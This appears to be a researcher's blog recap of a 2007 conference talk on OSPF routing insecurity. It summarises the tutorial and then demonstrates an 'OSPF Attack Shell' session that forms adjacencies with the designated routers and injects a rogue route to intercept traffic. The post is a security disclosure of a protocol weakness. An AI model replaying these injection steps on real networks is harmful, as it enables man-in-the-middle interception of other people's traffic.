Conference IT Underground, Prague 2007: OSPF routing protocol insecurities, still a problem?

IT Underground was held in Prague from March 7th, to March 9th. With Dror Roecher (ERNW), we talked about OSPF security, and about a new tool I developped to show some tricks against OSPF routing infrastructure.

First part: learning OSPF

In the first part, Dror teached OSPF (Open Shortest Path First) basics to attendees. It was a quick tutorial, but was largely enough for attendees to understand the concepts behind OSPF routing.

Dror also spoke about various theoritical attacks, and explained why they should be possible. One of the attack was to inject a new route in an OSPF router routing table, to basically do a man in the middle attack. If such an attack were successful, we would be able to redirect trafic to the IP address of our choice, giving us the ability to read all network trafic. The cool thing with OSPF is that this injected route will be added to all OSPF routers that have "links" together (that is, not only the ones on the same broadcast domain as the attacker).

Slides for this part may be found on IT Underground web site [1].

Second part: the tool

So, this tool basically shows that the injection of a new route is possible, and totally works. I developed this tool after being contacted by Dror, who was in search for a guy able to verify his thoughts about OSPF attacks. I started the development, by first implementing the OSPF encoding and decoding at the frame level using Net::Frame [2]. The tool was named OSPF Attack Shell, because it is made like a classical shell, into which you can pass commands.

In the first step of the demo, we showed how to become a true neighbor of currently available OSPF routers (DR, BDR). A true neighbor has an adjacency relationship with DR and BDR. Here is how to do that:

# ospf-ash.pl

  -- OSPF Attack Shell - 0.14 --

Using device    : eth0
Using source IP : 192.168.0.101
Using source MAC: 00:13:a9:2c:5b:a3
ash> listen
Hello from: 192.168.0.21
Found: DR : 192.168.0.22
Found: BDR: 192.168.0.21
Found: neighborList: 192.168.0.22

ash> exchange
192.168.0.22: exchange complete
192.168.0.21: exchange complete

ash> lock

The first command "listen" just waits for a Hello frame to be emitted by an OSPF router currently on the broadcast network. Then, the "exchange" command tries to establish an adjacency relation with DR and BDR. In our example, it worked ok. Finally, the "lock" command will keep sending a Hello frame from our IP address to keep the neighborship with DR and BDR.

Now the we are seen as a valid neighbor, we can inject a new route to all available OSPF routers. This route will be flooded to the entire OSPF infrastructure. Here is how to do it:

ash> lsu_router('172.16.0.0','255.255.0.0')

We have injected a new route (172.16.0.0/16), and all trafic directed to these IP addresses will first travel by our attacking IP address. References

 [1] Routing Protocol Security - still a problem? - Dror Roecher
         http://www.ernw.de/content/e7/e181/e520/download523/ospf-sec_02_dr_ger.pdf

 [2] Net::Frame - GomoR
         http://search.cpan.org/~gomor/